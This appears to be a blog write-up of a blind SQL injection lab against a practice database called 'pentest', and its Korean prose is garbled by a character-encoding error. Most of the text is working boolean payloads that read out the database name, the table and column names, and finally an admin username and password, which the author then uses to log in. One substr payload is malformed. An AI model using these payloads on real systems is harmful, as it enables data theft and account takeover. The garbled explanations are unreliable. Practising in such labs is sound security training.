์ƒˆ์†Œ์‹

์ธ๊ธฐ ๊ฒ€์ƒ‰์–ด

๐Ÿ“  Secure

SQL Injection ์‹ค์Šต

  • -
๋ฐ˜์‘ํ˜•

1. ์—๋Ÿฌ ๋ฐ ์ทจ์•ฝ์  ์ง„๋‹จ

board_id์— ' ์ถ”๊ฐ€ ํ›„ Forward ํ•˜๊ธฐ
์—๋Ÿฌ๋ฌธ์ด ๋œจ์ง€๋งŒ ํ•ด๋‹น ์—๋Ÿฌ๋ฌธ์€ DB์—๋Ÿฌ๊ฐ€ ์•„๋‹Œ ์„œ๋ฒ„ ์—๋Ÿฌ๋ฌธ


idx 3-1 ์ž…๋ ฅ ํ›„ Forward
๊ทธ๋Ÿฌ๋‚˜ ๋จนํžˆ์ง€ ์•Š์Œ์„ ํ™•์ธ


blind ๋ฐฉ์‹์œผ๋กœ ๊ณต๊ฒฉ ๊ฐ€๋Šฅ ํ™•์ธ 
์ฐธ์ผ๋•Œ ๊ฒฐ๊ณผ๊ฐ’๊ณผ ๊ฑฐ์ง“์ผ๋•Œ ๊ฒฐ๊ณผ๊ฐ’
Contents based ๊ณต๊ฒฉ ๊ฐ€๋Šฅ

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ ๊ธ€์ž ์ˆ˜ 7๊ธ€์ž
length((SELECT database()))=7

# ๋ฐ์ดํ„ฐ ๋ฒ ์ด์Šค์˜ ๊ธ€์ž ์ฒซ ๊ธ€์ž๊ฐ€ 'a' ์ธ๊ฐ€์š”?
substr((SELECT database()))='a'
# ' < ๊ธฐํ˜ธ๋ฅผ ์“ธ ์ˆ˜ ์—†์„ ๋•Œ ์•„์Šคํ‚ค์ฝ”๋“œ ๋ถ€๋“ฑํ˜ธ๋กœ ์‚ฌ์šฉ
ascii(substr((SELECT database()),1,1))>80
ascii(substr((SELECT database()),1,1))=112
ascii(substr((SELECT database()),2,1))=101
ascii(substr((SELECT database()),3,1))=110
ascii(substr((SELECT database()),4,1))=116
ascii(substr((SELECT database()),5,1))=101
ascii(substr((SELECT database()),6,1))=115
ascii(substr((SELECT database()),7,1))=116

ํ…Œ์ด๋ธ” ๊ฐฏ์ˆ˜ ์ถ”์ถœ

2 matches๋กœ ์ฐธ ํ™•์ธ

# pentest ํ…Œ์ด๋ธ” ๊ฐฏ์ˆ˜๊ฐ€ 5๊ฐœ ์ธ๊ฐ€์š” ?
(SELECT count(*) FROM information_schema.tables WHERE table_schema=0x70656E74657374)=5

์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ” ๊ธ€์ž ์ˆ˜ ์ถ”์ถœ

# ์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 5๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1))=5
# ๋‘๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ n๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 1,1))=n
# ์„ธ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 6๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1))=6
# ๋„ค๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ n๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 3,1))=n
# ๋‹ค์„ฏ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์˜ ๊ธ€์ž์ˆ˜๊ฐ€ 4๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1))=4

# pentest์˜ ์ฒซ๋ฒˆ์งธ ํ…Œ์ด๋ธ”์ด๋ฆ„์˜ ์ฒซ ๊ธ€์ž๊ฐ€ 98์ธ๊ฐ€์š” ?
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),1,1))=98
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),3,1))=97
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),4,1))=114
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 0,1),5,1))=100

# 3 > 6๊ธ€์ž notice
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),1,1))=110
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),2,1))=111
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),3,1))=116
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),4,1))=105
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),5,1))=99
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 2,1),6,1))=101
# 4 > n๊ธ€์ž
# 5 > 4๊ธ€์ž user
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),1,1))=117
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),2,1))=115
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),3,1))=101
ascii(substr((SELECT table_name FROM information_schema.tables WHERE table_schema=0x70656E74657374 LIMIT 4,1),4,1))=114

ํ…Œ์ด๋ธ” ์นผ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ๊ธ€์ž ์ˆ˜๋Š”?

# pentest ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์˜ user ํ…Œ์ด๋ธ”์˜ ์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ์ด๋ฆ„์€ 2๊ธ€์ž ์ธ๊ฐ€์š” ?
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 0,1))=2
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 1,1))=6
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 2,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 3,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 4,1))=4
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 5,1))=8
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 6,1))=5
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 7,1))=7
length((SELECT column_name FROM information_schema.columns WHERE table_schema=0x70656E74657374 and table_name=0x75736572 LIMIT 8,1))=5

 

์ฒซ๋ฒˆ์งธ ์นผ๋Ÿผ์˜ ์ฒซ๋ฒˆ์งธ ๊ธ€์ž

# pentest์— user์— ์žˆ๋Š” ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ : ID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),1,1))=73
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+0,1),2,1))=68
# pentest์— user์— ์žˆ๋Š” ๋‘๋ฒˆ์งธ ์ปฌ๋Ÿผ : userID
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+1,1),1,1))=117
117 115 101 114 73 68 > userID
# pentest์— user์— ์žˆ๋Š” ์„ธ๋ฒˆ์งธ ์ปฌ๋Ÿผ : password
ascii(substr((SELECT+column_name+FROM+information_schema.columns+WHERE+table_schema%3d0x70656E74657374+and+table_name%3d0x75736572+LIMIT+2,1),1,1))=112
112 97 115 115 119 111 114 100 > password
# pentest์— user์— userID์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ๊ธ€์ž์ˆ˜๋Š” 5๊ธ€์ž
length((SELECT userID FROM pentest.user LIMIT 0,1))=5

# pentest์— user์— userID์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ์ฒซ ๊ธ€์ž = 97
ascii(substr((SELECT userID FROM pentest.user LIMIT 0,1),1,1))=97
# 97 100 109 105 110 > admin

# pentest์— user์— password์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ๊ธ€์ž์ˆ˜๋Š” 11๊ธ€์ž
length((SELECT password FROM pentest.user LIMIT 0,1))=11
# 97 100 109 105 110 > admin

# pentest์— user์— password์— ์ฒซ๋ฒˆ์งธ ์ปฌ๋Ÿผ์˜ ์ฒซ ๊ธ€์ž = 49
ascii(substr((SELECT password FROM pentest.user LIMIT 0,1),1,1))=49
# 49 113 50 119 51 101 52 114 53 116 33 > 1q2w3e4r5t!

์•Œ๊ฒŒ๋œ ID์™€ ๋น„๋ฐ€๋ฒˆํ˜ธ๋กœ ๋กœ๊ทธ์ธ

 

๋ฐ˜์‘ํ˜•

'๐Ÿ“  Secure' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

XSS - Cross Site Script  (0) 2022.07.12
Secure coding  (0) 2022.07.12
CODE Injection  (0) 2022.07.07
SQL Injection ์ธ์ฆ ์šฐํšŒ  (0) 2022.07.07
SQL Injection - Error Based  (0) 2022.07.06
Contents

ํฌ์ŠคํŒ… ์ฃผ์†Œ๋ฅผ ๋ณต์‚ฌํ–ˆ์Šต๋‹ˆ๋‹ค

์ด ๊ธ€์ด ๋„์›€์ด ๋˜์—ˆ๋‹ค๋ฉด ๊ณต๊ฐ ๋ถ€ํƒ๋“œ๋ฆฝ๋‹ˆ๋‹ค.